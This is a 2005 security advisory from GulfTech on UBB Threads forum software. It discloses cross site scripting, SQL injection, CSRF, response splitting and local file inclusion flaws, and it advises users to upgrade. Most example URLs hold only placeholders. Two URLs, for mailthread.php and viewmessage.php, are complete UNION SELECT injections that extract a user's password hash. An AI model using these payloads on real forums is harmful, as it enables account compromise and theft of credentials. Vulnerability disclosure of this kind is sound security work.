ubb652.txt

`##########################################################  
# GulfTech Security Research June 23rd, 2005  
##########################################################  
# Vendor : Infopop Corporation  
# URL : http://www.ubbcentral.com/ubbthreads/  
# Version : All Versions Prior To 6.5.2 Beta  
# Risk : Multiple Vulnerabilities  
##########################################################  
  
  
  
Description:  
UBB Threads is a very popular forum system developed by Infopop.  
There are a number of vulnerabilities in UBB Threads that may allow  
an attacker to execute cross site scripting, http response splitting,  
and cross site request forgery attacks. Also, an attacker may include,  
execute, or read arbitrary local files. These vulnerabilities may allow  
for an attacker to completely compromise an installation of UBB Threads  
and possibly more. Users are encouraged to upgrade as soon as possible  
to the latest UBB Threads release.  
  
  
  
Cross Site Scripting:  
There are a large number of cross site scripting issues in UBB Threads.  
Due to the large number the examples I will simply put a [XSS] where an  
attacker might place offending code. Some examples might look like this.  
  
http://ubbt/dosearch.php?Cat=0&Searchpage=2[XSS]&topic=  
http://ubbt/newreply.php?Cat=0&Board=UBB8&Number=39818[XSS]&page=0&what=showflat&fpart=1&vc=1  
http://ubbt/newreply.php?Cat=0&Board=UBB8&Number=39818&page=0&what=showflat[XSS]&fpart=1&vc=1  
http://ubbt/newreply.php?Cat=0&Board=UBB8&Number=39818&page=0[XSS]&what=showflat&fpart=1&vc=1  
http://ubbt/showprofile.php?Cat=0&User=7&Number=39818[XSS]&Board=UBB8&what=showflat&page=0&fpart=1&vc=1  
http://ubbt/showprofile.php?Cat=0&User=7&Number=39818&Board=UBB8[XSS]&what=showflat&page=0&fpart=1&vc=1  
http://ubbt/showprofile.php?Cat=0&User=7&Number=39818&Board=UBB8&what=showflat[XSS]&page=0&fpart=1&vc=1  
http://ubbt/showflat.php?Cat=0&Board=UBB5&Number=42173&page=0&fpart=all[XSS]  
http://ubbt/showflat.php?Cat=0&Board=UBB5&Number=42173&page=0[XSS]&fpart=all  
http://ubbt/showmembers.php?Cat=&like=p[XSS]&sb=1&page=1  
  
These vulnerabilities can be used to steal sensitive information from a  
user, and possibly lead to malicious code execution in the context of  
the victims browser.  
  
  
  
SQL Injection:  
There are a number of SQL Injection issues in UBB Threads that allow for  
an attacker to influence, or disclose sensitive information in the   
underlying  
database. Below are some examples.  
  
http://ubbt/download.php?Number=42227[SQL]  
http://ubbt/calendar.php?Cat=7&month=6&year=2005[SQL]  
http://ubbt/calendar.php?Cat=&month=7[SQL]&year=2005  
http://ubbt/modifypost.phpCat=0&Username=foobar&Number=  
[SQL]&Board=UBB8&page=0&what=showflat&fpart=&vc=1&Approved=yes&convert=markup  
&Subject=Re%3A+Pruning+old+posts&Icon=book.gif&Body=yup&markedit=1&addsig=1&  
preview=1&peditdelete=Delete+this+post  
  
The above is just examples, and will not do anything except maybe   
trigger an error  
but I will provide a few examples of how these vulnerabilities could be   
exploited.  
First, there is an SQL Injection issue that occurs when emailing a   
thread to someone  
  
http://ubbt/mailthread.php?Cat=0&Board=UBB2&Number=-99'%20UNION%20SELECT%20U_Username  
,U_Password%20FROM%20w3t_Users%20WHERE%20U_Username%20=%20'victim'/*&page=0&vc=1&  
fpart=1&what=showflat  
  
Visiting a url like the one above by itself will not cause much to   
happen, but if  
you complete the form, you will notice an email arrives at the address   
you specified  
in the form, and the contents of that email are the contents you queried   
from the  
database! Also, in the private messaging feature there is another   
serious SQL Injection  
issue.  
  
http://ubbt/viewmessage.php?Cat=&message=-99%20UNION%20SELECT%20null,U_Username,U_Password,  
0,0%20FROM%20w3t_Users%20WHERE%20U_Username%20=%20'foobar'/*&status=N&box=received  
  
A url like the one above would yield the user 'foobar' s password hash   
and username.  
  
http://ubbt/addfav.php?Cat=0&Board=UBB2&main=41654[SQL]&type=reminder&Number=41654&page=  
0&vc=1&fpart=1&what=showflat  
http://ubbt/notifymod.php?Cat=0&Board=UBB5&Number=42173[SQL]&page=0&what=showthreaded  
http://ubbt/grabnext.php?Cat=4&Board=UBB23&mode=showflat&sticky=0&dir=old&posted=1045942715[SQL]  
  
Also, there are a few SQL Injection issues that require the post method.   
For example  
when rating a profile, or post, or anything else (they all use the same   
feature) you  
can specify arbitrary SQL statements to the "Main" parameter. Also, when   
conducting a  
search an attacker may specify arbitrary SQL statements in the "Forum[]"   
array and  
have them execute successfully with the privileges of the current mysql   
user.  
  
  
  
Cross Site Request Forgery:  
There are a number of CSRF issues in UBB Threads, and these issues allow   
for an attacker  
to unwillingly change their ignore, and address settings.  
  
http://ubbt/addaddress.php?Cat=0&User=123&Board=&Number=&what=showmembers&page=1  
http://ubbt/toggleignore.php?Cat=0&User=123&Board=&Number=&what=showmembers&page=1  
http://ubbt/removeignore.php?Cat=&User=123  
http://ubbt/removeaddress.php?Cat=&User=123  
  
These issues really affect privacy on the forums, and make it nearly   
impossible to keep  
away from any harassing members :)  
  
  
HTTP Response Splitting:  
There are several HTTP Response Splitting issues in UBB Threads. These   
issues allow  
for an attacker to manipulate headers sent back to the user, and may   
allow for code  
execution in the context of the victims browser. The "Cat" parameter in   
the files  
toggleshow.php, togglecats.php, and showprofile.php are all vulnerable.  
  
  
  
Local File Inclusion:  
UBB Threads suffers from a local file inclusion vulnerability when   
handling language  
preferences extracted from the cookie. The "language" parameter is never   
sanitized  
and can thus be exploited by specifying an arbitrary file location   
appended with a null  
byte (%00). This could lead to code execution, or in most cases, file   
disclosure.  
  
  
Solution:  
An updated version of UBB threads has been released to address the   
previously mentioned  
issues, and users are strongly advised to upgrade immediately.  
  
http://www.ubbcentral.com/boards/showflat.php/Cat/0/Number/42351/Main/42351/#Post42351  
  
Users can visit the above url to get information regarding UBB Threads   
security updates.  
  
  
  
Related Info:  
The original advisory can be found at the following location  
http://www.gulftech.org/?node=research&article_id=00084-06232005  
  
  
  
Credits:  
James Bercegay of the GulfTech Security Research Team  
`